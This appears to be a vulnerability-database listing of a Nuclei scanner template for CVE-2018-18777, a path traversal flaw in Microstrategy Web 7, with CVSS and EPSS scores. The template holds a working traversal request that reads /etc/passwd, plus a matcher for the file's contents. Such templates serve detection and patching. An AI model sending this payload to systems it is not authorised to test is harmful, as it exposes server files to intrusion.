Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-18777
HistoryJun 20, 2021 - 10:26 a.m.

Microstrategy Web 7 - Local File Inclusion

2021-06-2010:26:27
ProjectDiscovery
github.com
1

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

4.4 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

52.5%

Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
id: CVE-2018-18777

info:
  name: Microstrategy Web 7 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: |
    Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of Microstrategy Web.
  reference:
    - https://www.exploit-db.com/exploits/45755
    - http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18777
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2018-18777
    cwe-id: CWE-22
    epss-score: 0.00185
    epss-percentile: 0.5564
    cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microstrategy
    product: microstrategy_web
  tags: cve,cve2018,traversal,edb,packetstorm,microstrategy,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ae2a757ac5e3ef34ba3a5451c8125e2c7fe97fd9bef596f66376117e2764db670221008367fce471250198dca07e7745de56033b0108d5296706c7f9484ab47fed9ae1:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

4.4 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

52.5%